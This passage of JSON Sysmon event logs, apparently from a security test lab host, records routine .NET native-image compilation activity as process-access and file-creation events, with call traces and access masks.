C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:38.794","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-131F-5F25-0000-0010CCCC0A00}","TargetProcessId":"4544","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:38","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8137,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:38.794\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-131F-5F25-0000-0010CCCC0A00}\r\nTargetProcessId: 4544\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:38.794","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-131F-5F25-0000-0010CCCC0A00}","TargetProcessId":"4544","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:38","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8138,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:38.810\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1352-5F25-0000-0010EA1C0E00}\r\nTargetProcessId: 4544\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:38.810","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1352-5F25-0000-0010EA1C0E00}","TargetProcessId":"4544","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:38","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8139,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:01:38.857\r\nProcessGuid: {E2A3D6B1-1352-5F25-0000-0010EA1C0E00}\r\nProcessId: 4544\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\11c0-0\\System.AddIn.Contract.dll\r\nCreationUtcTime: 2020-08-01 07:01:38.857","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:01:38.857","ProcessGuid":"{E2A3D6B1-1352-5F25-0000-0010EA1C0E00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\11c0-0\\System.AddIn.Contract.dll","CreationUtcTime":"2020-08-01 07:01:38.857","EventReceivedTime":"2020-08-01 07:01:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:38","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8140,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:38.872\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1325-5F25-0000-00107B290B00}\r\nTargetProcessId: 3744\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:38.872","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1325-5F25-0000-00107B290B00}","TargetProcessId":"3744","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:38","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8141,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:38.872\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1325-5F25-0000-00107B290B00}\r\nTargetProcessId: 3744\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:38.872","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1325-5F25-0000-00107B290B00}","TargetProcessId":"3744","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:38","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8142,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:38.888\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1352-5F25-0000-001007200E00}\r\nTargetProcessId: 3744\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:38.888","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1352-5F25-0000-001007200E00}","TargetProcessId":"3744","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:38","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8143,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:38.935\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1352-5F25-0000-00105B230E00}\r\nTargetProcessId: 3952\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:38.935","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1352-5F25-0000-00105B230E00}","TargetProcessId":"3952","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:38","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8144,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:38.935\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1352-5F25-0000-00105B230E00}\r\nTargetProcessId: 3952\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:38.935","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1352-5F25-0000-00105B230E00}","TargetProcessId":"3952","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:38","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8145,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:38.951\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1352-5F25-0000-00105B230E00}\r\nTargetProcessId: 3952\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 